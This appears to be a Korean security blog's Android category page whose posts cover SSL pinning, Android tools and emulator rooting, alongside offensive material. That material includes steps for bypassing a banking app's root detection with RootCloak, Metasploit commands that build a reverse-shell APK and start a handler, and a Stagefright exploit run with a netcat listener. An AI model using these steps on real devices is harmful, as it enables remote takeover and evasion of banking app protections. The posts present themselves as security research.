'40./41. Android'에 해당되는 글 13건

  1. 2016.02.29 Securing mobile banking on Android with SSL certificate pinning
  2. 2015.11.16 Android Rooting 체크 우회(Hooking with Cydia Substrate)
  3. 2015.11.16 [Android Exploit] Android Exploit with metasploit
  4. 2015.11.16 [Android Exploit] Stagefright 취약점
  5. 2015.09.17 Android Tool
  6. 2015.03.05 Sublime Text에서 Androguard plugin 설치 및 사용법 (1)
  7. 2015.02.12 [Android] 안드로이드에 python 설치
  8. 2015.01.30 Unicode 한글
  9. 2014.04.19 BlueStacks 루팅 후 Root Explorer APK 설치
  10. 2014.04.17 Cheat Engine을 이용한 BlueStacks 메모리 해킹 (2)
  11. 2014.04.17 bluestacks 설치 및 App 실행
  12. 2013.12.25 apk manager 5.1
  13. 2013.12.16 SHW-M180S 루팅
애플리케이션과 서버간에 민감한 정보를 안전하게 전송하고 싶을 때, SSL 방식을 채택하여 사용할 것이다. 하지만 SSL 채택은 반만 맞는 이야기다.

애플리케이션과 서버간에 민감한 데이터를 전송하는 일은 빈번하다. 가장 대표적인 예로는 모바일 은행 애플리케이션이 있다. 가장 최악의 사황으로는 악의적인 해커가 당신의 은행 계좌 정보나 돈을 훔치거나 더 나쁜 행위를 저지를 수 있다.

모바일 뱅킹 솔루션에서 보안은 중요하기 때문에 데이터의 안전과 비밀성을 유지하기 위해서 SSL을 사용하는 것이다. 하지만 이러한 방법은 깨질 수 있다.

Certificate pinning이란?


SSL 연결을 만들 때 기본적으로 클라이언트는 서버의 인증서를 확인하게 된다.
- 신뢰할수 있는 상위(root) 인증서를 검증 가능한 체인이 존재하는지 여부
- 요청한 호스트 명의 신뢰 여부

서버가 이미 알고있는 특정 인증서의 경우에 대해서 확인하지 않는 경우가 발생한다.

장지(모바일 디바이스) 안에 신뢰하는 저장서와 원격서버 사이의 의존도로 인해 보안문제가 발생한다. 사용자가 임의로 모바일 디바이스에 신뢰하는 저장소에 인증서를 설치 가능하므로, Man-in-the middle attacks(중간자 공격)이 가능하다.

Certificate pinning은 이러한 문제를 해결해준다. 서버에서 사용할 인증서를 모바일 안에 하드코딩하게된다. 앱은 디바이스 내 신뢰하는 저장소에 의존하는 대신에 앱 내부에 있는 인증서를 사용하여 서버와 SSL을 연결하게 된다.

또한 디바이스에 부가적인 인증서 설치가 필요 없으며 자체 서명된 인증서로 호스트 신뢰 기능을 제공한다.

장점 :
- 보안 강화 : Pinned SSL 인정서를 사용하면 앱은 디바이스 내 신뢰하는 인증서 저장소와 독립하여 사용할 수 있다. 앱 내부에 하드 코딩 된 신뢰하는 인증서 저장소를 건드는건 쉽지 않다. 앱을 디컴파일하여 변경 후 재 컴파일  해야한다. 앱에서 서명했던 기존 개발자와 같은 Android Keystore을 사용하여 서명은 불가능하다.

- 비용 절감 : SSL 인증서 피닝은 자체 서명된 인증서를 사용할 수 있도록 제공해준다. 예를들어 앱 개발 시 자체 API 서버를 사용한다면 인증서에 대한 지불 대신에 자체 서명된 인증서를 서버에 사용가능하다. 비록 그 비용이 아주 적어도 이러한 방법으로 보안 강화와 비용 절감할 수 있다.

결점 :
- 융통성 부족 : SSL 인증서 피닝을 사용하고 있다면 쉽게 SSL 인증서 변경이 불가능하다. 모든 SSL인증서를 변경하기 위해서는 앱을 업데이트하고 Google Play에 다시 올려야한다. 또한 사용자들도 재설치 해야한다.

Android 내부에서 동작 방식

Android 내 Pinning SSL 인증서를 넣는 일은 쉽지 않다. Android 2.2 이상 버전에서 작업해야하며, 적용 전에 많은 정보를 찾아야한다.

프로세스 내 3가지 중요한 단계 :
- 원하는 서버에 대한 인증서 획득(전체 인증서 체인)
- .bks 형태로 인증서를 제작 - 모든 디바이스에서 호환하기 위해서는 매우 중요한 작업
- Android에서 제공한 Apache HTTP Client 사용 - SSL 연결을 위해서 제공한 .bks keystore를 초기화하는데 사용

완벽하게 동작하는 예 : https://github.com/ikust/hello-pinnedcerts

SSL 피닝은 모든 앱에서 동작해야하는건 아니지만, 위험도가 높은 앱에서 보안 레벨을 올리는데 의미가 있다.

참고 자료 : https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning
저작자 표시 비영리 동일 조건 변경 허락
신고
일부 금융 모바일 애플리케이션의 경우 Super user 권한을 임시 비활성화해도 정상 작동하지만 대부분의 금융 애플리케이션은 위변조를 통하여 Android 플랫폼 위변조를 탐지를 우회하게 된다. 하지만 최근 모바일 애플리케이션은 난독화, 재컴파일 방지, 위변조 탐지 등을 통해서 애플리케이션 위변조를 이용한 Super user 권한 탐지 우회가 어려워지고 있다.

Android Hooking

후킹(영어: hooking)은 소프트웨어 공학 용어로, 운영 체제나 응용 소프트웨어 등의 각종 컴퓨터 프로그램에서 소프트웨어 구성 요소 간에 발생하는 함수 호출, 메시지, 이벤트 등을 중간에서 바꾸거나 가로채는 명령, 방법, 기술이나 행위를 말한다. 이때 이러한 간섭된 함수 호출, 이벤트 또는 메시지를 처리하는 코드를 후크(영어: hook)라고 한다.

크래킹(불법적인 해킹)을 할 때 크래킹 대상 컴퓨터의 메모리 정보, 키보드 입력 정보 등을 빼돌리기 위해서 사용되기도 한다.

예를 들어 특정한 API를 후킹하게 되면 해당 API의 리턴값을 조작하는 등의 동작을 수행할 수 있다..
- 위키백과, 우리 모두의 백과사전.


후킹을 통해서 ARM 기반의 안드로이드 환경(Rooting 필수)에서 모바일 애플리케이션 위변조 없이 해당 애플리케이션 라이브러리 내 함수에 대한 호출 주소를 변경하여 Rooting 탐지 및 특정 기능 변경이 가능하다.



There is a process that is called "Zygote". This is the heart of the Android runtime. Every application is started as a copy ("fork") of it. This process is started by an /init.rc script when the phone is booted. The process start is done with /system/bin/app_process, which loads the needed classes and invokes the initialization methods.

*. zygote process
Zygote란  Android System에서 애플리케이션을 빠르게 구동하기 위해서 미리 fork되어있는 중립적인 상태로 대기하는 프로세스로 system에서 exec()호출을 통해 특정 애플리케이션을 실행하면 zygote process와 결합하여 구동하게 된다.

zygote process는 init process에 의해 구동되며 init process가 system 구동에 필요한 각 daemon을 로드 후 마지막에 로드되는 process로 android 서비스 및 애플리케이션은 zygote process를 통해 로드되어 진다. Android Shell ps 명령어를 이용하여 PID와 PPID를 통하여 init process가 생성시킨 process들과 zygote process가 생성시킨 process를 확인 가능하다. zygote process가 실행이 되면 Dalvik VM을 실행시키게 되는데 class와 resource를 미리 로딩한 상태로 application의 logic을 기다리게되어 구동 속도가 빨라지게 된다.

* Cydia Substrate는 Xposed와 비슷한 방식으로 후킹을 진행하며, 아직 Cydia Substrate의 후킹방식을 분석을 종료하지 못하여 대신 Xposed 후킹 방식을 서술하였습니다.

Xposed 프레임웍을 설치하면 확장 app_process 실행 파일을 /system/bin 아래 복사한다. 확장된 setup 프로세스는 Xposed jar 파일을 classpath에 추가하고 특정 위치에서 method를 호출하게 된다. 예를 들어 VM이 생성된 직후 Zygote가 애플리케이션의 main method를 호출 하기 전에 Xposed가 method 내부에서 일부 맥락(context)을 수행하게 된다.


후킹방법

- Superuser 권한 활성화 확인



- Hana N Bank 루팅 탐지 확인




- Play 스토어에서 Cydia substrate, Root cloak plus 설치



- RootCloak Plus에서 루팅 탐지를 우회할 어플리케이션 선택



- Hana N Bank 어플리케이션 종료 후 재 실행 (루팅 미탐지)



 ※ 주의

 본 사이트의 모든 정보는 정보보안 강화를 위한 연구 목적으로 작성되는 블로그 입니다.

 만일 악의적으로 이용시 사용자는 아래와 같은 관련법으로 처벌 받을 수 있습니다.


 

※ 참고자료

Cydia Substrate
http://www.cydiasubstrate.com/id/38be592b-bda7-4dd2-b049-cec44ef7a73b/

Xposed
https://github.com/rovo89/XposedBridge/wiki/Development-tutorial


저작자 표시 비영리 동일 조건 변경 허락
신고
metasploit reverse_tcp android
http://exploiterz.blogspot.kr/2013/07/how-to-hack-android-devices-using.html

메타익스플로잇을 사용하여 안드로이드 Exploit Code가 포함된 APK 생성 및 리버스커넥션 연결하기

# ifconfig


# msfpayload android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 R > oneandonlyme.apk


# msfconsole


msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost X.X.X.X
msf exploit(handler) > set lport 4444


msf exploit(handler) > exploit


sysinfo
webcam_list
getuid
ps




저작자 표시 비영리 동일 조건 변경 허락
신고

Android 미디어 파일을 처리하는 Stagefright에서 다수의 정수 오버플로우 취약점이 발견되어 해커가 조작된 미디어 파일을 MMS를 이용하여 피해자로 전송할 경우 사용자의 인지 없이 원격 코드 실행 및 권한상승이 가능하다.

영향 받는 버전

안드로이드 2.2(Froyo) ~ 5.1.1_r5(Lollipop)


Common Vulnerabilities and Exposures (CVE) 번호

CVE-2015-1538
CVE-2015-1539
CVE-2015-3824
CVE-2015-3826
CVE-2015-3827
CVE-2015-3828

테스트

https://www.exploit-db.com/exploits/38124/

exploit code를 실행하면 수많은 에러 메세지가 발생한다. Linux에서 Windows로 포팅하는 작업이 필요하다.

# 특수 문자 치환
〃  ->  "
〃'''' ->  """
―  ->  -










 # 불필요한 문구 삭제
- See more at: https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purpose/#sthash.MbvoiMxd.dpuf



# mp4.py로 파일명 변환



# 옵션 특수문자 치환 ―  ->  -




# 실행


> python mp4.py -c [리버스커넥션을 연결한 서버 IP] [Port]





# 리버스커넥션 열기
> nc.exe -l -p [Port]


# Genymotion에서 시연 실패


-_-??

참고자료

- http://www.zdnet.com/article/check-your-android-device-for-the-stagefright-vulnerability/
- http://www.techrepublic.com/article/how-to-scan-your-device-for-the-stagefright-vulnerability/
- http://thehackernews.com/2015/09/stagefright-android-exploit-code.html
- http://null-byte.wonderhowto.com/forum/stagefright-exploit-released-0164432/
- https://en.wikipedia.org/wiki/Stagefright_(bug)



저작자 표시 비영리 동일 조건 변경 허락
신고

Android Tool

40./41. Android 2015.09.17 17:24
Please use left sidebar to navigate between sections.                                  Last Updated on: 8-May-2015

 Forensics Tools 

  • Android Forensics - Open Source Android Forensics App and Framework

  • Android Data Extractor Lite

  • BitPim - BitPim is a program that allows you to view and manipulate data on many CDMA phones from LG, Samsung, Sanyo and other manufacturers.

  • LiME - LiME (formerly DMD) is a Loadable Kernel Module (LKM), which allows the acquisition of volatile memory from Linux and Linux-based devices, such as those powered by Android.

  • Open Source Android Forensics

  • P2P-ADB - Phone to Phone Android Debug Bridge - A project for "debugging" phones from other phones.

  • pySimReader - It allows users to write out arbitrary raw SMS PDUs to a SIM card.

 Development Tools 

  • Android SDK - The Android software development kit (SDK) includes a comprehensive set of development tools. These include a debugger, libraries, a handset emulator based on QEMU, documentation, sample code, and tutorials.

  • Android NDK - The NDK is a toolset that allows you to implement parts of your app using native-code languages such as C and C++.

  • ADT Bundle - The Android Developer Tools(ADT) bundle is a single download that contains everything for developers to start creating Android Application

    • Android Studio IDE or Eclipse IDE
    • Android SDK tools
    • Android 5.0 (Lollipop) Platform
    • Android 5.0 emulator system image with Google APIs
  • Native Android Runtime Emulation - A native Android emulator featuring the following functions:

    • Full stack support for ELF built by Android NDK.
    • Seeminglessly native gdb support.
    • Link and load shared library.
    • Open to extension of different architecture and C runtime.
  • Root Tools - RootTools provides rooted developers a standardized set of tools for use in the development of rooted applications.

 Static Analysis Tools 

  • Androwarn:- Yet another static code analyzer for malicious Android applications

  • ApkAnalyser - ApkAnalyser is a static, virtual analysis tool for examining and validating the development work of your Android app.

  • APKInspector - APKinspector is a powerful GUI tool for analysts to analyze the Android applications.

  • Error-Prone - Catch common Java mistakes as compile-time errors

  • FindBugs + FindSecurityBugs - FindSecurityBugs is a extension for FindBugs which include security rules for Java applications. It will find cryptography problems as well as Android specific problems.

  • FlowDroid - FlowDroid is a context-, flow-, field-, object-sensitive and lifecycle-aware static taint analysis tool for Android applications.

  • Lint - The Android lint tool is a static code analysis tool that checks your Android project source files for potential bugs and optimization improvements for correctness, security, performance, usability, accessibility, and internationalization.

  • Smali CFGs - Smali Control Flow Graph's

  • Smali and Baksmali - smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation.

  • Thresher - Thresher is a static analysis tool that specializes in checking heap reachability properties. Its secret sauce is using a coarse up-front points-to analysis to focus a precise symbolic analysis on the alarms reported by the points-to analysis.

 Dynamic Analysis Tools 

  • Android Hooker - This project provides various tools and applications that can be use to automaticaly intercept and modify any API calls made by a targeted application.

  • Droidbox - DroidBox is developed to offer dynamic analysis of Android applications

  • Drozer - Drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

  • Xposed Framework

 Reverse Engineering Tools 

  • Androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !)

  • Android loadble Kernel Modules - It is mostly used for reversing and debugging on controlled systems/emulators.

  • AndBug - Android Debugging Library

  • ApkTool - A tool for reverse engineering Android Apk Files

  • APK Studio - APK Studio is an IDE for decompiling/editing & then recompiling of android application binaries.

  • Bytecode-Viewer - A Java 8 Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More)

  • CodeInspect - A Jimple-based Reverse-Engineering framework for Android and Java applications.

  • dedex - A command line tool for disassembling Android DEX files.

  • Dex2Jar - Tools to work with android .dex and java .class files

  • dexdisassembler - A GTK tool for disassembling Android DEX files.

  • Fern Flower - FernFlower Java decompiler

  • Fino - Android small footprint inspection tool

  • Introspy-Android - Blackbox tool to help understand what an Android application is doing at runtime and assist in the identification of potential security issues.

  • JD-Gui - Yet another fast Java Decompiler

  • JEB - The Interactive Android Decompiler

  • smali - An assembler/disassembler for Android's dex format

 Hooking Tools 

  • ADBI Framework - Simple and easy to use toolkit for dynamic instrumentation of Dalvik code.

  • Cydia Substrate - Cydia Substrate for Android enables developers to make changes to existing software with Substrate extensions that are injected in to the target process's memory.

  • Xposed Framework - Xposed framework enables you to modify the system or application aspect and behaviour at runtime, without modifying any Android application package(APK) or re-flashing.

  • Frida - Inject JavaScript to explore native apps on Android

 Obfuscators & Deobfuscators Tools 

  • APK Obfuscator - A generic DEX file obfuscator and munger.

  • Bytecode-Viewer - A Java 8 Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More)

  • Class Name Deobfuscator - Simple script to parse through the .smali files produced by apktool and extract the .source annotation lines.

  • Dalvik Obfuscator - A set of tools/scripts to obfuscate and manipulate dex files

  • Simplify - Generic Android Deobfuscator

 Online Analyzers 

  • Android Observatory - The Android Observatory is a web interface to a large repository of Android applications. It allows users to search or browse through thousands of Android apps and retrieve metadata for those apps.

  • Android APK Decompiler - Decompiling APK files made easy. Online decompiler.

  • AndroidTotal - AndroTotal is a free service to scan suspicious APKs against multiple mobile antivirus apps.

  • Anubis - Malware Analysis for Unknown Binaries.

  • Akana - Akana is an online Android app Interactive Analysis Enviroment (IAE), which is combined with some plugins for checking the malicious app.

  • App360Scan - Tells about permissons used by an Application and what harm it can cause to users.

  • CopperDroid - It automatically perform out-of-the-box dynamic behavioral analysis of Android malware.

  • Dexter - Dexter is an interactive Android software analysis environment with collaboration features.

  • Eacus - A lite Android app analysis framework

  • Mobile Sandbox - The Mobile-Sandbox provides static and dynamic malware analysis combined with machine learning techniques for Android applications.

  • Sandroid - An automatic Android application analysis system

  • Virus Total - VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware.

 Android Testing Distributions 

  • Appie - A portable software package for Android Pentesting and an awesome alternative to existing Virtual machines.It is a one stop answer for all the tools needed in Android Application Security Assessment, Android Forensics, Android Malware Analysis.

  • Android Tamer - Android Tamer is a Virtual / Live Platform for Android Security professionals.

  • AppUse - AppUse is a VM (Virtual Machine) developed by AppSec Labs.

  • Mobisec - Mobile security testing live environment

  • Now Secure App Testing Suite:Community Edition

  • Santoku Linux - Santoku Linux is a virtual machine developed by NowSecure Mobile.

  • Shadow OS - ShadowOS is a free tool designed by Fortify on Demand to help Security and QA teams test Android applications for security vulnerabilities. It is a custom OS based off of KitKat that intercepts specific areas of the device's operation and makes testing apps for security vulnerabilites easier.

  • Vezir Project - Yet Another Linux Virtual Machine for Mobile Application Pentesting and Mobile Malware Analysis.

 Android Vulnerable Apps 

 Android Security Apps 

  • Android IMSI-Catcher-Detector - It is an app to detect IMSI-Catchers. IMSI-Catchers are false mobile towers (base stations) acting between the target mobile phone(s) and the real towers of service providers. As such they are considered a Man-In-The-Middle (MITM) attack. In the USA the IMSI-Catcher technology is known under the name "StingRay".

  • Am I Vulnerable - AIV is an Android security app that notifies the user of publicly known vulnerabilities found in the installed version of apps on the device.

Application Security Framework

  • AppRay - App-Ray takes a look inside your apps and helps you understand what they really do. In fully automated tests, App-Ray analyzes apps and highlights vulnerabilities, data leaks, and privacy breaches.

  • YSO-Mobile Security Framework - Mobile Security Framework is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis.

 Android Malwares Related 

 Tutorials 

 Android Vulnerability List 

 Android Security Libraries 

  • Android Password Store

  • Android Pinning - A standalone library project for certificate pinning on Android.

  • Conceal By Facebook - Conceal provides easy Android APIs for performing fast encryption and authentication of data.

  • Dexguard - DexGuard is our specialized optimizer and obfuscator for Android. Create apps that are faster, more compact, and more difficult to crack.

  • Encryption - Encryption is a simple way to create encrypted strings to Android project.

  • CWAC-Security - Helping You Help Your Users Defend Their Data

  • IOCipher - IOCipher is a virtual encrypted disk for apps without requiring the device to be rooted.

  • Java AES Crypto - A simple Android class for encrypting & decrypting strings, aiming to avoid the classic mistakes that most such classes suffer from.

  • NetCipher - This is an Android Library Project that provides multiple means to improve network security in mobile applications.

  • OpenPGP API - The OpenPGP API provides methods to execute OpenPGP operations, such as sign, encrypt, decrypt, verify, and more without user interaction from background threads.

  • OWASP Java HTML Sanitizer

  • Proguard - ProGuard is a free Java class file shrinker, optimizer, obfuscator, and preverifier. It detects and removes unused classes, fields, methods, and attributes.

  • Spongy Castle - a repackage of Bouncy Castle for Android

  • SQL Cipher - SQLCipher is an open source extension to SQLite that provides transparent 256-bit AES encryption of database files.

  • Secure Preferences - Android Shared preference wrapper than encrypts the keys and values of Shared Preferences.

  • Trusted Intents - Library for flexible trusted interactions between Android apps

 Best Practices 

 Contribute 

It is awesome to see that you want to contribute in this wiki, which would directly help the community. Project/Tools which are no longer maintained are not included in this wiki. List of awesome contributors to this wiki is given below. Please follow one of the ways from below to include tool or resource in this wiki-

Please let me know if you have any suggestions

Below is the list of awesome people who contributed to this wiki.I would like to specially thanks Philippe Arteau and Amandeep Gupta who contributed a lot for UI of this website.


https://mobilesecuritywiki.com/

저작자 표시 비영리 동일 조건 변경 허락
신고
Sublime Text에서 Androguard plugin 설치 및 사용법


Androguard 툴은 애플리케이션 분석 및 apk 파일 리버싱 엔지니어링에 주로 초점되어 있으며, 안드로이드 애플리케이션 평가용으로 사용된다.

툴은 파이선으로 되어있으며 명령어 프롬프트를 이용하여 apk 파일에 접근이 가능하다. 

Installation 설치

우선 플러그인이 설치 가능한 Sublime text 버전을 설치해야한다.

Sublime Text version 2 : http://www.sublimetext.com/2

또한, Androguard plugin 집 파일을 다운받아야 한다.

Portable Version (포터블 버전)
Sublime Text를 다운받은 후 1번은 실행해야 필요한 폴더가 생성된다. 
이전에 다운받은 ag-st-1.9.zip 파일을 압축을 해제하고 아래 폴더 위치로 복사한다.
+ Portable Sublime\Data\Packages\

Usage 사용법

Androuard Plugin 사용법은 안드로이드 apk 파일을 Sublime Text 애플리케이션에 드래그하여 넣는다. 아래 이미지와 같이 Sublime Text에 APK가 몇분만에 로드되었다.



Ctrl + F5 키 조합으로 Androguard plugin을 활성화하고 APK 파일 분석을 시작할 수 있다.


APK 파일 내 가장 중요한 파일은 분홍색으로 표시되며, 추가로 분석이 가능하다. 가장 먼저 AndroidManifest.xml 파일을 확인한다. mainfest를 통해 애플리케이션에 필요한 권한 식별, 사용 할 main activity, 모든 activity 검색, 컨텐츠 제공자와 수신자의 정보등 애플리케이션 구동 및 여러 정보를 표시하고 있다.


원본 AndroidManifest.xml에 접근을 원할 경우 단순히 F5를 누르면 원래 형식의 Manifest에 접근 가능하다.


다시 분석중인 애플리케이션 메인페이지로 돌아간다. 애플리케이션 내 모든 Class 파일을 포함하고 있는 classes.dex 파일을 더블클릭한다. 모바일 애플리케이션의 사이즈에 따라서 Sublime Test가 정지되는 것처럼 보일 수 있으나 기달리면 분석이 완료됩니다. 분석이 끝나면 새로운 페이지가 열리며, 애플리케이션 내 모든 class가 포함하는 메소드와 필드를 확인 가능하다.


아무 method를  더블 클릭하면, Dalvik bytecode format으로 디컴파일된 코드를 확인 가능하다.


F5를 누르면, 디컴파일된 클레스가 java와 비슷한 코드로 변경되는 것을 확인 가능하다.


메소드 내에서 Ctrl+F6을 누른다면 해당 메소드를 호출하는 모든 함수를 확인 가능하다.
[이미지 없음]

마지막으로 Ctrl+F7을 누르면 지금 메소드를 호출하는 함수가 포함된 클래스들을 볼 수 있다.
[이미지 없음]

Androguard plugin을 통하여 안드로이드 애플리케이션 정보 수집 및 컴파일하는 과정에 크게 도움을 줄 수 있으며, 악성코드 분석 및 모바일 앱 침투 시험에 도움을 줄 수 있는 훌륭한 툴이라고 판단한다.


저작자 표시 비영리 동일 조건 변경 허락
신고

'40. > 41. Android' 카테고리의 다른 글

[Android Exploit] Stagefright 취약점  (0) 2015.11.16
Android Tool  (0) 2015.09.17
Sublime Text에서 Androguard plugin 설치 및 사용법  (1) 2015.03.05
[Android] 안드로이드에 python 설치  (0) 2015.02.12
Unicode 한글  (0) 2015.01.30
BlueStacks 루팅 후 Root Explorer APK 설치  (0) 2014.04.19

안드로이드 Python 설치


Scripting Layer for Android brings scripting languages to Android.

https://code.google.com/p/android-scripting/


android-scripting

https://code.google.com/p/android-scripting/downloads/detail?name=PythonForAndroid_r4.apk


















저작자 표시 비영리 동일 조건 변경 허락
신고

Unicode 한글

40./41. Android 2015.01.30 16:06
Insert title here 한글 -> 유니코드 결과 :

유니코드 -> 한글 결과 :
저작자 표시 비영리 동일 조건 변경 허락
신고

BlueStacks 루팅 후 Root Explorer APK 설치





루팅한 BlueStacks 아래와 같이 버전은 0.8.7이다.



 BlueStack Rooting용 툴

 

BSMultiTool_1.06r1.zip


 Superuser

 

UPDATE-Superuser-v3.2.zip


 Root Explorer apk

 

Root Explorer v3.1.7.apk




1. BlueStacks 루팅 하기



BSMultiTool을 압축을 해제한 후 UPDATE-Superuser-v3.2.zip랑 같은 폴더에 놓는다.


BlueStacks을 실행 시킨 후 BSMultiTool.exe를 실행 시키면 아래와 같은 windows 창을 볼 수 있다.


Enter! 하지만 any key...






BlueStacks이 루팅되는 것을 볼 수 있다.




BlueStacks이 종료되면서 루팅이 완료되었다.

Done!!

Q!





2. 외부 Windows에 있는 APK를 BlueStacks에 설치 하기

BlueStack이 설치되어있는 폴더(C:\Program File\BlueStacks)로 접근한다. HD-ApkHandler.exe 실행 파일로 설치하고 싶은 apk를 드래그 앤 드롭을 한다.










설치완료!





저작자 표시
신고

'40. > 41. Android' 카테고리의 다른 글

[Android] 안드로이드에 python 설치  (0) 2015.02.12
Unicode 한글  (0) 2015.01.30
BlueStacks 루팅 후 Root Explorer APK 설치  (0) 2014.04.19
Cheat Engine을 이용한 BlueStacks 메모리 해킹  (2) 2014.04.17
bluestacks 설치 및 App 실행  (0) 2014.04.17
apk manager 5.1  (0) 2013.12.25

How to cheat on Bluestacks with Cheat Engine 6.3


BlueStacks에서 Cheat Engine을 이용해서 메모리 검색을 하면 검색이 안된다. BlueStacks이 사용하는 에뮬레이터의 가상의 메모리 주소를 Cheat Engine이 접근하지 못하기 때문이다. Cheat Engine의 설정만 변경해 주면 BlueStacks 뿐만아니라 사용하고 있는 Windows 시스템의 물리적 메모리에 접근 할 수 있다.






1. Cheat Engine 6.3의 설정 부분으로 들어간다.



2. 설정의 Scan Settings 탭을 선택 후 Scan the follwing memory region type 아래에 있는

MEM_MAPPED:Memory that is mapped into the view of a section.(E.g: File mapping, emulator memory, slow)을 체크한다.



3. Debugger Options 탭 선택 후 Debugger method 부분의  Use Kernelmode debugger을 체크한다.



4. 마지막으로 Extra 탭에 있는 Query memory region routinesRead/Write Process Memory(Will caues slower scans)을 선택한다. 환경 설정은 끝났다.




5. Cheat Engine의 Open Process를 선택하여 맨 상단에 있는 00000000-[Physical Memory]를 선택 후 평소 처럼 Cheat Engine을 이용하면 된다.



특정 문자열을 검색하게 되면 평소 특정 프로세스만 선택해서 검색했을때 보다는 느린걸 확인 할 수 있다. 모든 프로세스를 검색한다고 보면 된다. 덕분에 BlueStacks에 있는 APP의 Memory도 검색한다.




Extra.. 


제가 하는 게임 Clash of Clans를 검색하여 엘릭서량을 검색하여 변경하였는데...



서버와 실시간 데이터(value)를 통신하고 있어 변경을 시도하였을때 서버와 통신이 끊히면서 재부팅되고 원상 복귀됨 ^^...... 또르르..




저 게임을 크랙 가능하다면 알려주세요..


저작자 표시
신고

'40. > 41. Android' 카테고리의 다른 글

Unicode 한글  (0) 2015.01.30
BlueStacks 루팅 후 Root Explorer APK 설치  (0) 2014.04.19
Cheat Engine을 이용한 BlueStacks 메모리 해킹  (2) 2014.04.17
bluestacks 설치 및 App 실행  (0) 2014.04.17
apk manager 5.1  (0) 2013.12.25
SHW-M180S 루팅  (0) 2013.12.16

Bluestacks


안드로이드 에뮬레이터 for windows


 Tool name

 Bluestack 

 Author

 

 Website

 http://www.bluestacks.com/

 License type

 

 Download

 

BlueStacks-SplitInstaller_native_c.exe




1. 설치

Bluestacks 웹 페이지에서 Windows 용을 다운 받는다.



BlueStacks-Splitlnstaller_native_c.exe 실행한다.



설치 중...



설치 완료 후 실행화면입니다.



Search 선택 시 Google Player로 연결되며 게임 및 앱을 설치 가능합니다.



Google 계정이 있어야 합니다.





2. 게임 실행



3. 간단한 사용




저작자 표시
신고

'40. > 41. Android' 카테고리의 다른 글

Unicode 한글  (0) 2015.01.30
BlueStacks 루팅 후 Root Explorer APK 설치  (0) 2014.04.19
Cheat Engine을 이용한 BlueStacks 메모리 해킹  (2) 2014.04.17
bluestacks 설치 및 App 실행  (0) 2014.04.17
apk manager 5.1  (0) 2013.12.25
SHW-M180S 루팅  (0) 2013.12.16

apk manager 5.1

40./41. Android 2013.12.25 23:33





apk manager 5.1 (젤리빈)


apk_manager_5.1_for_jeallybean.zip









저작자 표시
신고

'40. > 41. Android' 카테고리의 다른 글

Unicode 한글  (0) 2015.01.30
BlueStacks 루팅 후 Root Explorer APK 설치  (0) 2014.04.19
Cheat Engine을 이용한 BlueStacks 메모리 해킹  (2) 2014.04.17
bluestacks 설치 및 App 실행  (0) 2014.04.17
apk manager 5.1  (0) 2013.12.25
SHW-M180S 루팅  (0) 2013.12.16




* 필수물

-통합 USB 드라이버

http://www.samsung.com/sec/support/pcApplication/KIES/

- 오딘(Odin) 

Odin3 v1.85.rar

- 커널

맛클 www.matcl.com/









저작자 표시
신고

'40. > 41. Android' 카테고리의 다른 글

Unicode 한글  (0) 2015.01.30
BlueStacks 루팅 후 Root Explorer APK 설치  (0) 2014.04.19
Cheat Engine을 이용한 BlueStacks 메모리 해킹  (2) 2014.04.17
bluestacks 설치 및 App 실행  (0) 2014.04.17
apk manager 5.1  (0) 2013.12.25
SHW-M180S 루팅  (0) 2013.12.16
1 

카운터

Total : 85,369 / Today : 1 / Yesterday : 31
get rsstistory!